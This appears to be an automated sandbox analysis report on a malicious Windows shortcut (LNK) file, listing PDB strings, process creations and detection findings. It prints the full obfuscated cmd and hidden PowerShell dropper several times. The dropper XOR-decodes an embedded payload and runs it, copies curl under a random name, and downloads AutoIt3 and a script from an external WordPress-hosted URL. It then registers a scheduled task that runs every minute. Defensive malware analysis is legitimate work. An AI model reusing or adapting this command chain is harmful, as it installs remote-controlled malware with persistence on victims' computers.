Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000006.00000002.1453411821.0000026329A40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: lib.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: on.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: curl.pdb source: GSlLzFnTov.exe, 00000008.00000000.1395554704.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453592808.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000000.1415716755.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr
Source:	Binary string: .pdb8; source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 089\System.Core.pdb source: powershell.exe, 00000006.00000002.1453411821.0000026329A40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *on.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Obfuscated command line found

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;

Contains functionality to dynamically determine API calls

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Code function: 8_2_00007FF7F1DB1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,GetSystemDirectoryA,LoadLibraryA,free,

8_2_00007FF7F1DB1D84

PE file contains sections with non-standard names

Source: GSlLzFnTov.exe.1.dr

Static PE information: section name: _RDATA

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_00007FF7C13D0566 push esi; retf

3_2_00007FF7C13D0567

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe

Drops PE files

Source: C:\Windows\System32\cmd.exe

File created: C:\GSlLzFnTov\GSlLzFnTov.exe

Jump to dropped file

Boot Survival

Powershell creates an autostart link

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to 